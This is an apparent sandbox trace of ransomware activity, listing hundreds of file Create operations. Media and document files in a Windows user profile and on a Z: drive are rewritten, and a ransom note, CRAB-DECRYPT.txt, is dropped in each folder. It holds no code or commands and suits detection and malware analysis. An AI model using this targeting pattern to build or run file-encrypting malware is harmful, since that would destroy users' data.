Create C:\Users\Nd9E1FYi\Favorites\Bing.url desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\ZWHKH4ncD.avi desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\Favorites\Daily Mail.url desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Favorites\eBay UK.url desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Favorites\Google Egypt.url desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Favorites\Google file storage.url desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Favorites\Google France.url desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Favorites\Google Japan.url desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\0in5AWEIxKMUstDhHc.pps desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\Favorites\Google Russia.url desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Favorites\Google Taiwan.url desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Favorites\Google Turkey.url desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Favorites\Hao123.url desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Favorites\Links\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\Favorites\MSN.url desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Favorites\Nicovideo.url desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\LRgNGE3acWIgEa.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\Favorites\Sohu.url desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Favorites\Twitch.url desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Favorites\Yahoo News Japan.url desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Favorites\Yandex.url desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Favorites\Zhihu.url desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Links\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create Z:\1ngG8KQUVLO.m4a desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\Music\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Users\Nd9E1FYi\Music\4HyC47VsRdMug7Gc\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\Music\aqUncS51gyQ66kdm0p.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Music\EYd9uzm2uBvXNM.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Music\IGFj0BTIDDvf5Dt3A.wav desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Music\P_Px\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\Music\P_Px\29sQJgTJn6vfV.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Music\P_Px\h6GPodAi0hSbAnF_r.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Music\P_Px\hwDUcpa1JBujJ.m4a desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Music\P_Px\tets6 HWEXzv8Da26Fcf.m4a desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\vhzlvnYmCpbfD.mkv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\Music\P_Px\wgRWvQJa8iJ_hMepL6.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Music\P_Px\yMjOMRUyemD4dlr0n.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Music\qIcNo.wav desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Music\QM80RPucM\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\Music\QM80RPucM\4Z-EgFIopteJ7\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\Music\QM80RPucM\4Z-EgFIopteJ7\6dmfdQmH3.wav desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Music\QM80RPucM\4Z-EgFIopteJ7\dTH__zhIamvc98.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Music\QM80RPucM\4Z-EgFIopteJ7\up YA1Y8oxDA.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Music\QM80RPucM\4Z-EgFIopteJ7\Y9fRCStGrxko.wav desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\TWOSOYcL.rtf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\Music\QM80RPucM\o-VexDI.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Music\QM80RPucM\vyyOJqo UsqlQbEZP9f.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Music\Rv_iuPdDeifu2Bq\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\Music\Rv_iuPdDeifu2Bq\8cYqNm-.wav desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Music\Rv_iuPdDeifu2Bq\b8AGJwR.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Music\Rv_iuPdDeifu2Bq\K6jyK5\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\Music\Rv_iuPdDeifu2Bq\K6jyK5\6tl6Y7XkOe6_wGtiQB.wav desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Music\Rv_iuPdDeifu2Bq\K6jyK5\CrvQe_4CUjzS\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\Music\Rv_iuPdDeifu2Bq\K6jyK5\nTbDCTW818Aix\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\Music\Rv_iuPdDeifu2Bq\K6jyK5\nTbDCTW818Aix\9JYy0zhGPBA.m4a desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\vJvHFLFe.pps desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\Music\Rv_iuPdDeifu2Bq\K6jyK5\nTbDCTW818Aix\OCc9jwfTXSSXCwIQ3FwT.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Music\Rv_iuPdDeifu2Bq\K6jyK5\nTbDCTW818Aix\w13AP63T9TkT.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Music\Rv_iuPdDeifu2Bq\K6jyK5\nTbDCTW818Aix\xT6biou.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Music\Rv_iuPdDeifu2Bq\pMUVN.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Music\Rv_iuPdDeifu2Bq\vEyv.wav desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Music\Rv_iuPdDeifu2Bq\wDDlTMUtzuPRjXldKW.m4a desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Music\_SkRz7uqznuwQ.wav desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\My Documents\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Users\Nd9E1FYi\NetHood\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create Z:\9Mb9yKA.png desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\ntuser.dat.LOG1 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\ntuser.dat.LOG2 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TM.blf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000001.regtrans-ms desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000002.regtrans-ms desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\ntuser.ini desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\OneDrive\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\Pictures\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Users\Nd9E1FYi\Pictures\-suVf3QALoxUB6G.bmp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Pictures\7luG_S6_dk4.bmp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Pictures\9YFb-ocGCZm_JclJL\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create Z:\30yCZTi8h1x.ppt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\Pictures\9YFb-ocGCZm_JclJL\GeWoeF\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\Pictures\9YFb-ocGCZm_JclJL\GeWoeF\4sHYt1PZi2kf6WB Yio.bmp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Pictures\9YFb-ocGCZm_JclJL\GeWoeF\7blSwi6 bzIYzalyCH.bmp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Pictures\9YFb-ocGCZm_JclJL\GeWoeF\90 LAKKb8MCrS\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\Pictures\9YFb-ocGCZm_JclJL\GeWoeF\90 LAKKb8MCrS\BTVMj1YZkz_L.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Pictures\9YFb-ocGCZm_JclJL\GeWoeF\90 LAKKb8MCrS\OtJtmd5OKPOGSV.jpg desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Pictures\9YFb-ocGCZm_JclJL\GeWoeF\AF ELxZt.png desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Pictures\9YFb-ocGCZm_JclJL\GeWoeF\hRpeMa7SM_JlY\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\Pictures\9YFb-ocGCZm_JclJL\GeWoeF\hRpeMa7SM_JlY\dsm FADw.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\zKrYkW7P9h.odp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\Pictures\9YFb-ocGCZm_JclJL\GeWoeF\hRpeMa7SM_JlY\u5laif2gx_ ExgVR.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Pictures\9YFb-ocGCZm_JclJL\GeWoeF\TpypYqcZeqwuEglAORq\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\Pictures\9YFb-ocGCZm_JclJL\GeWoeF\TpypYqcZeqwuEglAORq\FNX1KY3uQNJM.png desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Pictures\9YFb-ocGCZm_JclJL\GeWoeF\TpypYqcZeqwuEglAORq\g5xE-kCe400N.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Pictures\9YFb-ocGCZm_JclJL\GeWoeF\TpypYqcZeqwuEglAORq\WgZ209V6i5TMyq9IY.jpg desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Pictures\9YFb-ocGCZm_JclJL\ntf8-Qny2wH4n07.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Pictures\9YFb-ocGCZm_JclJL\y4sU31V.jpg desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Pictures\BsTKhUmEmMsofD 80x\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\Pictures\BsTKhUmEmMsofD 80x\1qsQJw5gi.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Pictures\BsTKhUmEmMsofD 80x\4jGlepj\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\Pictures\BsTKhUmEmMsofD 80x\4jGlepj\3AmzVOB.png desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\UX0CIrthkmniE.xlsx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\Pictures\BsTKhUmEmMsofD 80x\4jGlepj\EfPM3dZRh.jpg desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Pictures\BsTKhUmEmMsofD 80x\4jGlepj\fYfmGknK PI.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Pictures\Camera Roll\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\Pictures\DYUmLcxN.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Pictures\lntr0HHuhYtnp-.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Pictures\QVpUXBjfw.jpg desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\aWJXG7BTk6.docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\XvsUo.m4a desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\haBoE0.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\yUtPCopr3.wav desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\Pictures\Saved Pictures\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\Pictures\_PS6\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\Pictures\_PS6\AIWfKT0Hj1zN0p.bmp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\OUzRKAK.odp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\Pictures\_PS6\E1G0z.bmp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Pictures\_PS6\GjwZzYwJT3voIw.png desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Pictures\_PS6\MZQBS.png desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Pictures\_PS6\nAZmaw4Er41A\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\Pictures\_PS6\sJlVys1tFGQ_V0pAe.bmp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Pictures\_PS6\_kqnSVMKLm1YPTlG.jpg desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\PrintHood\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\Recent\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\Saved Games\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\Searches\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\Searches\Everywhere.search-ms desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\dHSAr.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\Searches\Indexed Locations.search-ms desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\SendTo\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\Start Menu\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\Templates\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\Videos\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Create C:\Users\Nd9E1FYi\Videos\-pw1E7K.avi desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Videos\Cuo6SPOjWWTGl7OOS.flv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Videos\KJdEBKv\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\Videos\KJdEBKv\54q7Emi00InmUiBh4.flv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\Videos\KJdEBKv\7RcaJ-B-FulbWnBijcXE.flv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\2V4nNeRhoBFj576c7yH.odp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\Videos\KJdEBKv\iVwcNous96VML39.mkv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
